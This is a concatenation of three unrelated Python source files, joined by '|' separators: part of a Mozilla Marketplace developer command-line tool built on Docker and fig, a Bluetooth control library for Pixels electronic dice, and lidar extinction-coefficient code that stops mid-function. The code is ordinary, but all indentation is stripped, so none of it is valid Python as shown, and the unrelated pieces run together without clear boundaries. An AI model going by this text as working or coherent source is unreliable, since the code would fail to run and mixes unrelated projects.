cmd = ('docker exec -t -i {0} /bin/bash -c "cat {1} | sha1sum"'
.format(get_fig_container(project).id, files_str))
try:
container = subprocess.check_output(cmd, shell=True)
except subprocess.CalledProcessError:
print 'Failed to check: {0}'.format(branch)
raise
# If we could supress the ' -' on the output of sha1sum, we
# could remove this.
return container.split(' ')[0]
def get_local_requirements(branch, files):
branch_dir = join(locations()['tree'], branch)
local = sha.new()
for name in files:
with open(os.path.join(branch_dir, name.local)) as handle:
local.update(handle.read())
return local.hexdigest()
def get_project(project):
cur = os.getcwd()
def walk(directory):
if 'Dockerfile' in os.listdir(directory):
return os.path.basename(directory)
new = os.path.dirname(directory)
if new == directory:
raise ValueError('No project found.')
return walk(new)
project = project or walk(cur)
if project not in BRANCHES and project not in IMAGES:
raise ValueError('Project {0} not in BRANCHES or IMAGES'
.format(project))
return project
def get_fig_container(project):
cmd = main.Command()
proj = cmd.get_project(FIG_PATH)
project = FIG_ALIASES.get(project, project)
containers = proj.containers(service_names=[project])
if not containers:
raise ValueError('No containers found for: {0}. '
'Run: mkt up' .format(project))
return containers[0]
def fig_command(*args):
cmd = main.TopLevelCommand()
try:
cmd.dispatch(args, None)
except SystemExit as exit:
if exit.code != 0:
raise
def get_config_value(section, key, default=None):
config = configparser.ConfigParser()
config.read(CONFIG_PATH)
try:
return config.get(section, key)
except (configparser.NoSectionError, configparser.NoOptionError):
pass
return default
def set_config_value(section, key, value):
config = configparser.ConfigParser()
config.read(CONFIG_PATH)
try:
config.add_section(section)
except configparser.DuplicateSectionError:
pass
config.set(section, key, value)
print('Saving {0} to {1}'.format(key, CONFIG_PATH))
with open(CONFIG_PATH, 'w') as configfile:
config.write(configfile)
def indent(text, times=1):
wrapper = textwrap.TextWrapper(
initial_indent=' '*times, width=90, subsequent_indent=' '*times
)
for line in text.splitlines():
print wrapper.fill(line)
@contextmanager
def pushd(newdir):
wd = os.getcwd()
try:
os.chdir(newdir)
yield
finally:
os.chdir(wd)
def get_adb_devices():
devices = subprocess.check_output(['adb', 'devices']).strip().splitlines()
devices.pop(0) # remove the header
return devices
def get_image(args, parser):
image_name = args.name
image_dir = join(locations()['image'], image_name)
if not os.path.isdir(image_dir) or not os.path.exists(image_dir):
parser.error('image_dir: {0} does not exist. '
'Exiting'.format(image_dir))
return {
'name': image_name,
'dir': image_dir,
}
def select(choices, default=1, prompt='Please choose from the following [1]:'):
"""Create a prompt similar to select in bash."""
invalid_choice = 'Not a valid choice. Try again.'
for i, value in enumerate(choices):
print('{num}) {val}'.format(num=i + 1, val=value[0]))
def get_choice():
try:
val = raw_input(prompt)
if val == '':
val = default
val = int(val) - 1
except ValueError:
print(invalid_choice)
return get_choice()
except KeyboardInterrupt:
print('')
print('caught KeyboardInterrupt')
sys.exit(1)
try:
return choices[val]
except IndexError:
print(invalid_choice)
return get_choice()
return get_choice()
def get_ips_for_interface(interface):
"""Get the ips for a specific interface."""
interface_ips = []
try:
for fam, data in netifaces.ifaddresses(interface).items():
if fam == socket.AF_INET:
for d in data:
ip = d.get('addr')
if ip and not ip.startswith('127'):
interface_ips.append((interface, ip))
return interface_ips
except ValueError, exc:
raise ValueError('You provided "{int}". Choose one of: {opt}; '
'ValueError: {err}'
.format(opt=', '.join(netifaces.interfaces()),
int=interface, err=exc))
def get_interface_data(interface=None):
"""
Get interface data for one or more interfaces.
Returns data for all useful interfaces if no specific interface
is provided.
"""
if interface:
interface_ips = get_ips_for_interface(interface)
else:
interface_ips = []
for int_ in netifaces.interfaces():
if int_ == 'vboxnet0':
# Skip the Virtual Box interface because that's not publicly
# accessible.
continue
interface_ips += get_ips_for_interface(int_)
return sorted(interface_ips, key=lambda tup: tup[1])
def create_parser():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(
help='See each command for additional help',
title='Sub-commands', description='Valid commands'
)
parser_root = subparsers.add_parser(
'root', help='Create or update the root paths in the fig.yml.'
)
parser_root.add_argument(
'directory', help='Path to the marketplace repositories.',
default=None, nargs='?'
)
parser_root.add_argument(
'--buildfrom', help='Build locally or from docker hub',
dest='build', action='store'
)
# Set the default to empty to allow "mkt root" to just print out the
# root directory.
parser_root.set_defaults(build=None)
parser_root.set_defaults(func=root)
parser_bash = subparsers.add_parser(
'bash', help='Run a bash shell on a running container.'
)
parser_bash.add_argument(
'project',
help='Project name, if not given will be calculated.',
default=None, nargs='?')
parser_bash.set_defaults(func=bash)
parser_update = subparsers.add_parser(
'update', help='Runs git pull on each repo and any migrations.'
)
parser_update.add_argument(
'--git', help='Runs git pull', action='store_true')
parser_update.add_argument(
'--migrations', help='Runs migrations', action='store_true')
parser_update.set_defaults(func=update)
parser_check = subparsers.add_parser(
'check', help='Basic health checks of the system.'
)
parser_check.add_argument(
'--services', help='Checks the status page of each service.',
action='store_true'
)
parser_check.add_argument(
'--requirements', help='Checks the container requirements vs current'
' requirements',
action='store_true'
)
parser_check.add_argument(
'--versions', help='Checks versions of docker, boot2docker and fig',
action='store_true'
)
parser_check.set_defaults(func=check)
parser_up = subparsers.add_parser(
'up', help='Recreates fig.yml and starts the '
'containers in the background, a wrapper around `fig up`'
)
parser_up.set_defaults(func=up)
parser_checkgitconfig = subparsers.add_parser(
'chkgitconfig', help='Print out the git config for mkt branches'
)
parser_checkgitconfig.set_defaults(func=check_git_config)
parser_revs = subparsers.add_parser(
'revs', help='Print out the git revs for the trees'
)
parser_revs.set_defaults(func=revs)
parser_whoami = subparsers.add_parser(
'whoami', help='Check or store your github credentials'
)
parser_whoami.add_argument(
'github_username', help='Your github username e.g. "jrrtolkien"',
metavar="USER_NAME", default=None, nargs='?'
)
parser_whoami.set_defaults(func=whoami)
parser_checkout = subparsers.add_parser(
'checkout', help='Checkout your forks of sourcecode'
)
parser_checkout.add_argument(
'--moz_remote_name',
help='What to call the mozilla repo remote for this project. '
'Following github terminology this defaults to "upstream"',
metavar="MOZ_REMOTE_NAME",
default='upstream', nargs='?'
)
parser_checkout.add_argument(
'--fork_remote_name',
help='What to call your fork remote for this project. Following '
'github terminology this defaults to "origin"',
metavar="FORK_REMOTE_NAME", default='origin', nargs='?'
)
parser_checkout.set_defaults(func=checkout)
parser_bind = subparsers.add_parser(
'bind', help='Bind the mp.dev domain to your public IP on '
'a Firefox OS device. Your public ID must be a proxy to '
'your internal Docker IP.'
)
parser_bind.add_argument(
'--bind_ip',
help='Public IP to bind to. If empty, the IP will be discovered.')
parser_bind.add_argument(
'--bind_host', default='mp.dev',
help='Hostname to bind your IP too. Default: %(default)s')
parser_bind.add_argument(
'--bind_int',
help='Network interface to guess a public IP from. Example: en0',
default=None)
parser_bind.add_argument(
'--interfaces',
help='Show network interfaces but do not bind anything.',
action='store_true')
parser_bind.set_defaults(func=bind)
parser.add_argument('--version', action='version', version=__version__)
# Setup the logging for fig.
main.setup_logging()
return parser
|
<filename>pixels.py
# Utility classes to communicate with pixels dices
# Standard lib
from enum import IntEnum, unique
import time
import asyncio
import threading
import traceback
import sys
import signal
from queue import Queue
# Our types
from utils import integer_to_bytes, Event
from color import Color32
from animation import AnimationSet
# We're using the bluepy lib for easy bluetooth access
# https://github.com/IanHarvey/bluepy
from bluepy.btle import Scanner, ScanEntry, Peripheral, DefaultDelegate
# Known issues:
# hci0 needs occasional reset
# devices = Scanner().scan(timeout_secs)
# File "/home/pi/.local/lib/python3.7/site-packages/bluepy/btle.py", line 854, in scan
# self.stop()
# File "/home/pi/.local/lib/python3.7/site-packages/bluepy/btle.py", line 803, in stop
# self._mgmtCmd(self._cmd()+"end")
# File "/home/pi/.local/lib/python3.7/site-packages/bluepy/btle.py", line 312, in _mgmtCmd
# raise BTLEManagementError("Failed to execute management command '%s'" % (cmd), rsp)
# bluepy.btle.BTLEManagementError: Failed to execute management command 'scanend' (code: 11, error: Rejected)
# https://github.com/zewelor/bt-mqtt-gateway/issues/59
# > sudo hciconfig hci0 reset
@unique
class DiceType(IntEnum):
"""Supported Pixel dices types"""
_None = 0
_6 = 1
_20 = 2
@unique
class MessageType(IntEnum):
"""Pixel dices Bluetooth messages identifiers"""
_None = 0
WhoAreYou = 1
IAmADie = 2
State = 3
Telemetry = 4
BulkSetup = 5
BulkSetupAck = 6
BulkData = 7
BulkDataAck = 8
TransferAnimSet = 9
TransferAnimSetAck = 10
TransferSettings = 11
TransferSettingsAck = 12
DebugLog = 13
PlayAnim = 14
PlayAnimEvent = 15
StopAnim = 16
RequestState = 17
RequestAnimSet = 18
RequestSettings = 19
RequestTelemetry = 20
ProgramDefaultAnimSet = 21
ProgramDefaultAnimSetFinished = 22
Flash = 23
FlashFinished = 24
RequestDefaultAnimSetColor = 25
DefaultAnimSetColor = 26
RequestBatteryLevel = 27
BatteryLevel = 28
Calibrate = 29
CalibrateFace = 30
NotifyUser = 31
NotifyUserAck = 32
TestHardware = 33
SetStandardState = 34
SetLEDAnimState = 35
SetBattleState = 36
ProgramDefaultParameters = 37
ProgramDefaultParametersFinished = 38
# TESTING
SetAllLEDsToColor = 41
AttractMode = 42
PrintNormals = 43
PrintA2DReadings = 44
LightUpFace = 45
SetLEDToColor = 46
Count = 47
class PixelLink:
"""
Connection to a specific Pixel dice other Bluetooth
This class is not thread safe (because bluepy.btle.Peripheral is not)
"""
# Pixels Bluetooth constants
PIXELS_SERVICE_UUID = "6E400001-B5A3-F393-E0A9-E50E24DCCA9E".lower()
PIXELS_SUBSCRIBE_CHARACTERISTIC = "6E400001-B5A3-F393-E0A9-E50E24DCCA9E".lower()
PIXELS_WRITE_CHARACTERISTIC = "6E400002-B5A3-F393-E0A9-E50E24DCCA9E".lower()
# We're limited to 20 bytes paquets size because Raspberry Pi Model 3B is using Bluetooth 4.1
# so we're stuck making sure our BulkData paquet fits in the 20 byte, i.e. 16 bytes of payload
PIXELS_MESSAGE_BULK_DATA_SIZE = 16
# Default timeout in seconds used for waiting on a dice message
DEFAULT_TIMEOUT = 3
# Set to true to print messages content
_trace = False
_devices = []
@staticmethod
def _get_continue():
from getch import getch
return getch() == '\r'
""" Use one of the Pixels.connect_xxx() methods to create a valid Pixel object """
def __init__(self):
self._address = None
self._name = None
self._device = None
self._subscriber = None
self._writer = None
# Create the message map
self._message_map = {}
for i in range(MessageType.Count):
self._message_map[i] = []
# Setup events
self.face_up_changed = Event()
self.battery_voltage_changed = Event()
self._dtype = None
self._battery_voltage = -1
self._face_up = 0
@property
def name(self) -> str:
return self._name
@property
def address(self) -> str:
return self._address
@property
def dtype(self) -> DiceType:
return self._dtype
@property
def battery_voltage(self) -> float:
"""Battery voltage (usually between 2.5 and 4.2 volts)
Associated event: battery_voltage_changed"""
return self._battery_voltage
@property
def face_up(self) -> int:
"""Starts at 1, returns 0 if no face up
Associated event: face_up_changed"""
return self._face_up
async def _wait_until(self, condition, timeout):
""" Wait until the condition is true or the timeout expires"""
t = time.perf_counter()
start_time = t
end_time = start_time + timeout
while (not condition()) and (t < end_time):
await asyncio.sleep(0)
time.sleep(0.001)
t = time.perf_counter()
if not condition():
# not sure if I should throw or just return the condition...
raise Exception("Timeout while waiting for condition")
def _send(self, message_type: MessageType, *args):
if PixelLink._trace:
print(f'{self.name} <= {message_type.name}: {", ".join([format(i, "02x") for i in args])}')
Pixels.send_data(self, message_type, *args)
async def _send_and_ack(self, msg_type: MessageType, msg_data, ack_type: MessageType, timeout = DEFAULT_TIMEOUT):
assert(timeout >= 0)
self._send(msg_type, *msg_data)
ack_msg = None
def on_message(self, msg):
nonlocal ack_msg
if not ack_msg and msg[0] == ack_type:
ack_msg = msg
self._message_map[ack_type].append(on_message)
try:
await self._wait_until(lambda: ack_msg != None, timeout)
finally:
self._message_map[ack_type].remove(on_message)
return ack_msg
def _process_message(self, msg):
"""Processes a message coming for the device and routes it to the proper message handler"""
if PixelLink._trace:
print(f'{self.name} => {MessageType(msg[0]).name}: {", ".join([format(i, "02x") for i in msg[1:]])}')
handlers = self._message_map.get(msg[0])
for handler in handlers:
if handler != None:
# Pass the message to the handler
handler(self, msg)
def _die_type_handler(self, msg):
self._dtype = DiceType(msg[1])
def _debug_log_handler(self, msg):
endl = msg[1:].index(0) + 1 # find index of string terminator
print(f'DEBUG[{self.address}]: {bytes(msg[1:endl]).decode("utf-8")}')
def _battery_level_handler(self, msg):
import struct
voltage = struct.unpack('<f', bytes(msg[1:])) #little endian
#print(f'Battery voltage: {voltage}')
if self._battery_voltage != voltage:
self._battery_voltage = voltage
self.battery_voltage_changed.notify(voltage)
def _state_handler(self, msg):
state = msg[1]
face = msg[2]
#print(f'Face {face + 1} state {state}')
face = face + 1 if state == 1 else 0
if self._face_up != face:
self._face_up = face
self.face_up_changed.notify(face)
def _notify_user_handler(self, msg):
assert(msg[0] == MessageType.NotifyUser)
timeout, ok, cancel = msg[1:4]
txt = bytes(msg[4:]).decode("utf-8")
can_abort = ok and cancel
txt_key = 'Enter to continue, any other key to abort' if can_abort else 'Any key to continue'
print(f'{txt} [{txt_key}, timeout {timeout}s]:')
ok = PixelLink._get_continue()
if not can_abort:
ok = True
print("Continuing" if ok else "Aborting")
self._send(MessageType.NotifyUserAck, 1 if ok else 0)
return ok
async def _upload_bulk_data(self, data: bytes, progress_callback, timeout = DEFAULT_TIMEOUT):
assert(len(data))
assert(timeout >= 0)
# Send setup message
await self._send_and_ack(MessageType.BulkSetup, integer_to_bytes(len(data), 2), MessageType.BulkSetupAck, timeout)
# Then transfer data
total_size = len(data)
remainingSize = total_size
offset = 0
while remainingSize > 0:
size = min(remainingSize, PixelLink.PIXELS_MESSAGE_BULK_DATA_SIZE)
header = [size] + integer_to_bytes(offset, 2)
await self._send_and_ack(MessageType.BulkData, header + data[offset:offset+size], MessageType.BulkDataAck, timeout)
if progress_callback != None:
progress_callback(offset, total_size)
remainingSize -= size
offset += size
async def upload_animation_set(self, anim_set: AnimationSet, timeout = DEFAULT_TIMEOUT):
data = []
def append(dword):
data.extend(integer_to_bytes(dword, 2))
append(len(anim_set.palette))
append(len(anim_set.keyframes))
append(len(anim_set.rgb_tracks))
append(len(anim_set.tracks))
append(len(anim_set.animations))
append(anim_set.heat_track_index)
update_percent_increment = 0.1
next_update_percent = update_percent_increment
def print_progress(progress, total):
nonlocal update_percent_increment
nonlocal next_update_percent
percent = progress / total
if percent > next_update_percent:
print(f"Uploading animation: {percent * 100:.2f}% complete")
next_update_percent += update_percent_increment
await self._send_and_ack(MessageType.TransferAnimSet, data, MessageType.TransferAnimSetAck, timeout)
await self._upload_bulk_data(anim_set.pack(), print_progress, timeout)
def await_upload_animation_set(self, anim_set: AnimationSet, timeout = DEFAULT_TIMEOUT):
""" Kicks off a task to upload an animation set and waits for it to complete """
return asyncio.run(self.upload_animation_set(anim_set, timeout))
async def refresh_battery_voltage(self, timeout = DEFAULT_TIMEOUT):
await self._send_and_ack(MessageType.RequestBatteryLevel, [], MessageType.BatteryLevel, timeout)
return self.battery_voltage
def await_refresh_battery_voltage(self, timeout = DEFAULT_TIMEOUT):
""" Kicks off a task to refresh the battery voltage and waits for it to complete """
return asyncio.run(self.refresh_battery_voltage(timeout))
async def refresh_state(self, timeout = DEFAULT_TIMEOUT):
await self._send_and_ack(MessageType.RequestState, [], MessageType.State, timeout)
def await_refresh_state(self, timeout = DEFAULT_TIMEOUT):
""" Kicks off a task to refresh the state and waits for it to complete """
return asyncio.run(self.refresh_state(timeout))
def request_telemetry(self, activate):
self._send(MessageType.RequestTelemetry, 1 if activate else 0)
def play(self, index, remap_face = 0, loop = 0):
self._send(MessageType.PlayAnim, index, remap_face, loop)
def stop(self, index, remap_face = 0):
self._send(MessageType.StopAnim, index, remap_face)
def play_event(self, event, remap_face = 0, loop = 0):
self._send(MessageType.PlayAnimEvent, event, remap_face, loop)
def force_LEDs_color(self, color: Color32):
c = integer_to_bytes(color.to_rgb(), 4)
self._send(MessageType.SetAllLEDsToColor, *c)
def force_LED_color(self, ledIndex, color: Color32):
""" Led index starts at 0 """
data = []
data.extend(integer_to_bytes(ledIndex, 1))
data.extend(integer_to_bytes(color.to_rgb(), 4))
self._send(MessageType.SetLEDToColor, *data)
def start_calibration(self):
self._send(MessageType.Calibrate)
def print_a2d_levels(self):
self._send(MessageType.PrintA2DReadings)
def light_up_face(self, face, color: Color32, remapFace = 0, layoutIndex = 255, remapRot = 255):
data = []
data.extend(integer_to_bytes(face, 1))
data.extend(integer_to_bytes(remapFace, 1))
data.extend(integer_to_bytes(layoutIndex, 1))
data.extend(integer_to_bytes(remapRot, 1))
data.extend(integer_to_bytes(color.to_rgb(), 4))
self._send(MessageType.LightUpFace, *data)
def set_led_anim_state(self):
self._send(MessageType.SetLEDAnimState)
class Pixels:
""" Manages multiple pixels at once. Also supports the interactive mode """
@unique
class Command(IntEnum):
_None = 0
AddPixel = 1
RemovePixel = 2
SendMessage = 3
TerminateThread = 4
command_queue = Queue()
connected_pixels = []
available_pixels = []
DEFAULT_SCAN_TIMEOUT = 3
@staticmethod
def enumerate_pixels(timeout = DEFAULT_SCAN_TIMEOUT):
"""Returns a list of Pixel dices discovered over Bluetooth"""
print(f"Scanning BLE devices...")
scanned_devices = Scanner().scan(timeout)
Pixels.available_pixels.clear()
for dev in scanned_devices:
#print(f'Device {dev.addr} ({dev.addrType}), RSSI={dev.rssi} dB')
if dev.getValueText(7) == PixelLink.PIXELS_SERVICE_UUID:
# Grab full name if possible, otherwise short name
name = dev.getValueText(9) or dev.getValueText(8)
Pixels.available_pixels.append(dev)
print(f"Discovered Pixel {name}")
return Pixels.available_pixels
@staticmethod
async def connect_by_name(pixel_name):
"""Connects to a single pixel, by name.
This is a coroutine because connecting to the dice takes time."""
for dev in Pixels.available_pixels:
# Grab full name if possible, otherwise short name
name = dev.getValueText(9) or dev.getValueText(8)
if name == pixel_name:
return await Pixels.connect_pixel(dev)
raise Exception(f"Could not find pixel named {pixel_name}")
return None
@staticmethod
def await_connect_by_name(pixel_name):
"""Connects to a single pixel, by name."""
return asyncio.run(Pixels.connect_by_name(pixel_name))
@staticmethod
async def connect_pixel(entry: ScanEntry) -> PixelLink:
assert entry != None
dice = PixelLink()
finished = False
def assigning_dev(ret_dev):
nonlocal finished
finished = True
# Get the BLE thread to connect to the device. We do this so the native code helper is attached to the BLE thread, not this one
Pixels.command_queue.put([Pixels.Command.AddPixel, entry, dice, assigning_dev])
while not finished:
await asyncio.sleep(0)
if dice._device != None:
# register default message handlers
dice._message_map[MessageType.IAmADie].append(PixelLink._die_type_handler)
dice._message_map[MessageType.DebugLog].append(PixelLink._debug_log_handler)
dice._message_map[MessageType.BatteryLevel].append(PixelLink._battery_level_handler)
dice._message_map[MessageType.State].append(PixelLink._state_handler)
dice._message_map[MessageType.NotifyUser].append(PixelLink._notify_user_handler)
# Check type
dice._dtype = None
dice._send(MessageType.WhoAreYou)
await dice._wait_until(lambda : dice._dtype != None, 10)
if not dice._dtype:
raise Exception("Pixel type couldn't be identified")
# Battery level
dice._battery_voltage = -1
await dice.refresh_battery_voltage()
# Face up (0 means no face up)
dice._face_up = 0
await dice.refresh_state()
print(f"Dice {dice.name} connected")
return dice
else:
return None
@staticmethod
def remove_pixel(pixel: PixelLink):
Pixels.command_queue.put([Pixels.Command.RemovePixel, pixel])
@staticmethod
def send_data(pixel: PixelLink, message_type: MessageType, *args):
Pixels.command_queue.put([Pixels.Command.SendMessage, pixel, message_type, *args])
@staticmethod
def _main():
while True:
# process queue of messages
while Pixels.command_queue.qsize() > 0:
cmd = Pixels.command_queue.get(False)
if cmd[0] == Pixels.Command.AddPixel:
# extract parameters
bluepy_entry = cmd[1]
pixel = cmd[2]
# create the device
# pixel = PixelLink()
pixel._address = bluepy_entry.addr
pixel._name = bluepy_entry.getValueText(9) or bluepy_entry.getValueText(8)
pixel._device = Peripheral(bluepy_entry.addr, bluepy_entry.addrType)
print(f"Connecting to dice {pixel._name} at address {pixel._address}")
try:
# Get connected_pixels service
service = pixel._device.getServiceByUUID(PixelLink.PIXELS_SERVICE_UUID)
if not service:
raise Exception('Pixel service not found')
# Get the subscriber and writer for exchanging data with the dice
pixel._subscriber = service.getCharacteristics(PixelLink.PIXELS_SUBSCRIBE_CHARACTERISTIC)[0]
pixel._writer = service.getCharacteristics(PixelLink.PIXELS_WRITE_CHARACTERISTIC)[0]
# This magic code enables notifications from the subscribe characteristic,
# which in turn keeps the firmware on the dice from erroring out because
# it thinks it can't send notifications. Note that firmware code has also been
# fixed so it won't crash as a result :)
# There is an example at the bottom of the file of notifications working
pixel._device.writeCharacteristic(pixel._subscriber.valHandle + 1, b'\x01\x00')
# Bluepy notification delegate
class ProcessMessageDelegate(DefaultDelegate):
def handleNotification(self, cHandle, data):
pixel._process_message(list(data))
pixel._device.withDelegate(ProcessMessageDelegate())
except:
pixel._device.disconnect()
pixel._device = None
raise
# store the pixel
Pixels.connected_pixels.append(pixel)
# notify calling code
cmd[3](pixel._device)
elif cmd[0] == Pixels.Command.RemovePixel:
pixel = cmd[1]
Pixels.connected_pixels.remove(pixel)
pixel._device.disconnect()
elif cmd[0] == Pixels.Command.SendMessage:
pixel = cmd[1]
data = bytes(cmd[2:])
pixel._writer.write(data)
elif cmd[0] == Pixels.Command.TerminateThread:
# close all connections
for pixel in Pixels.connected_pixels:
pixel._device.disconnect()
Pixels.connected_pixels.clear()
return
# poll BLE stacks
for pixel in Pixels.connected_pixels:
pixel._device.waitForNotifications(0.0001) # 0 seems to cause issues
# wait before looping again
time.sleep(0.0001)
@staticmethod
def start():
# install signal handler
def signal_handler(signal, frame):
Pixels.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# kick off thread
t = threading.Thread(target=Pixels._main)
t.start()
# start a scan!
Pixels.enumerate_pixels()
@staticmethod
def terminate():
Pixels.command_queue.put([Pixels.Command.TerminateThread])
@staticmethod
def is_in_interpreter():
interpreter = False
try:
interpreter = sys.ps1
except AttributeError:
interpreter = sys.flags.interactive
return interpreter
pixels = []
color = Color32(255, 255, 0)
async def main():
Pixels.start()
# pixels.append(await Pixels.connect_by_name("D_71"))
# await pixels[0].refresh_battery_voltage()
# dice2 = await PixelLink.connect_dice("D_55")
# connected_pixels.append(dice2)
# color = Color32(255, 255, 0)
# dice2.light_up_face(0, color)
#await dice1.refresh_battery_voltage()
#pixels.append(await Pixels.connect_by_name("D_48674010"))
#pixels.append(await Pixels.connect_by_name("D_71902510"))
#await pixels[0].upload_animation_set(AnimationSet.from_json_file('D20_animation_set.json'))
# await dice2.refresh_battery_voltage()
# If we're in the interactive interpreter, don't terminate the BLE thread, use Ctrl-C instead
# this way messages are still processed
if not Pixels.is_in_interpreter():
Pixels.terminate()
if __name__ == "__main__":
asyncio.run(main())
|
# -*- coding: utf-8 -*-
"""Classes for extinction calculation"""
from addict import Dict
from copy import deepcopy
from ELDAmwl.bases.factory import BaseOperation
from ELDAmwl.bases.factory import BaseOperationFactory
from ELDAmwl.component.interface import IExtOp
from ELDAmwl.component.interface import IMonteCarlo
from ELDAmwl.component.registry import registry
from ELDAmwl.extinction.product import Extinctions
from ELDAmwl.extinction.tools.operation import ExtinctionAutosmooth
from ELDAmwl.extinction.tools.operation import SignalSlope
from ELDAmwl.extinction.tools.operation import SlopeToExtinction
from ELDAmwl.utils.constants import ABOVE_MAX_ALT
from ELDAmwl.utils.constants import BELOW_OVL
from ELDAmwl.utils.constants import MC
from ELDAmwl.utils.constants import NC_FILL_INT
from ELDAmwl.utils.constants import NC_FILL_STR
import numpy as np
import zope
class CalcExtinction(BaseOperationFactory):
"""
creates a class for the calculation of an extinction coefficient
Returns an instance of BaseOperation which calculates the particle
extinction coefficient from a Raman signal. In this case, it
will be always an instance of CalcExtinctionDefault().
Keyword Args:
ext_params (:class:`ELDAmwl.extinction.params.ExtinctionParams`): \
retrieval parameter of the extinction product
slope_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
result of :class:`ELDAmwl.extinction.tools.operation.SignalSlope`
slope_to_ext_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
result of :class:`ELDAmwl.extinction.tools.operation.SlopeToExtinction`
raman_signal (:class:`ELDAmwl.signals.Signals`): Raman signal
empty_ext (:class:`ELDAmwl.extinction.product.Extinctions`): \
instance of Extinctions which has all meta data but profile data are empty arrays
Returns:
instance of :class:`ELDAmwl.bases.factory.BaseOperation`
"""
name = 'CalcExtinction'
def __call__(self, **kwargs):
assert 'ext_params' in kwargs
assert 'slope_routine' in kwargs
assert 'slope_to_ext_routine' in kwargs
assert 'raman_signal' in kwargs
assert 'empty_ext' in kwargs
res = super(CalcExtinction, self).__call__(**kwargs)
return res
def get_classname_from_db(self):
"""
return: always 'CalcExtinctionDefault' .
"""
return 'CalcExtinctionDefault'
@zope.interface.implementer(IExtOp)
class CalcExtinctionDefault(BaseOperation):
"""
Calculates particle extinction coefficient from Raman signal.
The result is a copy of empty_ext, but its dataset (data, err, qf) is filled with the calculated values
Keyword Args:
ext_params (:class:`ELDAmwl.extinction.params.ExtinctionParams`): \
retrieval parameter of the extinction product
slope_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
result of :class:`ELDAmwl.extinction.tools.operation.SignalSlope`
slope_to_ext_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
result of :class:`ELDAmwl.extinction.tools.operation.SlopeToExtinction`
raman_signal (:class:`ELDAmwl.signals.Signals`): Raman signal
empty_ext (:class:`ELDAmwl.extinction.product.Extinctions`): \
instance of Extinctions which has all meta data but profile data are empty arrays
Returns:
profiles of particle extinction coefficients(:class:`ELDAmwl.extinction.product.Extinctions`)
"""
name = 'CalcExtinctionDefault'
ext_params = None
signal = None
slope_routine = None
slope_to_ext_routine = None
result = None
x_data = None
y_data = None
yerr_data = None
qf_data = None
def __init__(self, **kwargs):
super(CalcExtinctionDefault, self).__init__(**kwargs)
self.signal = self.kwargs['raman_signal']
self.ext_params = self.kwargs['ext_params']
self.slope_routine = self.kwargs['slope_routine']
self.slope_to_ext_routine = self.kwargs['slope_to_ext_routine']
self.result = deepcopy(self.kwargs['empty_ext'])
def calc_slope(self, t, lev, window, half_win):
fb = lev - half_win
lb = lev + half_win
window_data = Dict({'x_data': self.x_data[t, fb:lb + 1],
'y_data': self.y_data[t, fb:lb + 1],
'yerr_data': self.yerr_data[t, fb:lb + 1],
})
sig_slope = self.slope_routine.run(signal=window_data)
qf = np.bitwise_or.reduce(self.qf_data[t, fb:lb + 1])
self.result.ds['data'][t, lev] = sig_slope.slope
self.result.ds['err'][t, lev] = sig_slope.slope_err
self.result.ds['qf'][t, lev] = qf
self.result.ds['binres'][t, lev] = window
def prepare_data(self, data):
self.x_data = np.array(data.range)
self.y_data = np.array(data.ds.data)
self.yerr_data = np.array(data.ds.err)
self.qf_data = np.array(data.ds.qf)
def calc_single_profile(self, t, data):
fvb = data.first_valid_bin(t)
lvb = data.last_valid_bin(t)
for lev in range(fvb, lvb):
window = int(data.ds.binres[t, lev])
half_win = window // 2
if lev < (fvb + half_win):
self.result.set_invalid_point(t, lev, BELOW_OVL)
elif lev >= (lvb - half_win):
self.result.set_invalid_point(t, lev, ABOVE_MAX_ALT)
else:
self.calc_slope(t, lev, window, half_win)
def run(self, data=None):
"""
run the extinction calculation
The the optional keyword arg 'data' allows to feed new raman signals into
an existing instance of CalcExtinctionDefault and run a new calculation.
This feature is used e.g., for Monte-Carlo error retrievals
Keyword Args:
data (:class:`ELDAmwl.signals.Signals`): Raman signal, default=None
Returns:
profiles of particle extinction coefficients(:class:`ELDAmwl.extinction.product.Extinctions`)
"""
if data is None:
data = self.signal
self.prepare_data(data)
for t in range(data.num_times):
self.calc_single_profile(t, data)
# extract relevant parameter for calculation of ext from signal slope
# from ExtinctionParams into Dict
param_dct = Dict({
'detection_wavelength': data.detection_wavelength,
'emission_wavelength': data.emission_wavelength,
'angstroem_exponent': self.ext_params.ang_exp_asDataArray,
})
# SlopeToExtinction converts the slope into extinction coefficients
self.slope_to_ext_routine(
slope=self.result.ds,
ext_params=param_dct).run()
return self.result
class ExtinctionFactory(BaseOperationFactory):
"""
optional argument resolution, can be LOWRES(=0) or HIGHRES(=1)
"""
name = 'ExtinctionFactory'
def __call__(self, **kwargs):
assert 'data_storage' in kwargs
assert 'ext_param' in kwargs
assert 'autosmooth' in kwargs
res = super(ExtinctionFactory, self).__call__(**kwargs)
return res
def get_classname_from_db(self):
"""
return: always 'ExtinctionFactoryDefault' .
"""
return ExtinctionFactoryDefault.__name__
class ExtinctionFactoryDefault(BaseOperation):
"""
derives particle extinction coefficient.
"""
name = 'ExtinctionFactoryDefault'
param = None
raman_sig = None
smooth_res = None
empty_ext = None
prod_id = NC_FILL_STR
resolution = NC_FILL_INT
def get_smooth_res(self):
if self.kwargs['autosmooth']:
result = ExtinctionAutosmooth()(
signal=self.raman_sig.ds,
smooth_params=self.param.smooth_params,
).run()
else:
result = self.data_storage.binres_common_smooth(self.prod_id, self.resolution)
self.smooth_res = result
def prepare(self):
self.param = self.kwargs['ext_param']
self.prod_id = self.param.prod_id_str
self.resolution = self.kwargs['resolution']
# raman_sig is a deepcopy from data_storage
self.raman_sig = self.data_storage.prepared_signal(
self.param.prod_id_str,
self.param.raman_sig_id)
self.get_smooth_res()
self.raman_sig.ds['binres'] = self.smooth_res
self.empty_ext = Extinctions.init(self.raman_sig, self.param)
def get_non_merge_product(self):
calc_routine = CalcExtinction()(
ext_params=self.param,
slope_routine=SignalSlope()(prod_id=self.prod_id),
slope_to_ext_routine=SlopeToExtinction(),
raman_signal=self.raman_sig,
empty_ext=self.empty_ext,
)
ext = calc_routine.run()
if self.param.error_method == MC:
adapter = zope.component.getAdapter(calc_routine, IMonteCarlo)
ext.err[:] = adapter(self.param.mc_params)
else:
ext = ext
del self.raman_sig
return ext
def get_product(self):
self.prepare()
if not self.param.includes_product_merging():
ext = self.get_non_merge_product()
else:
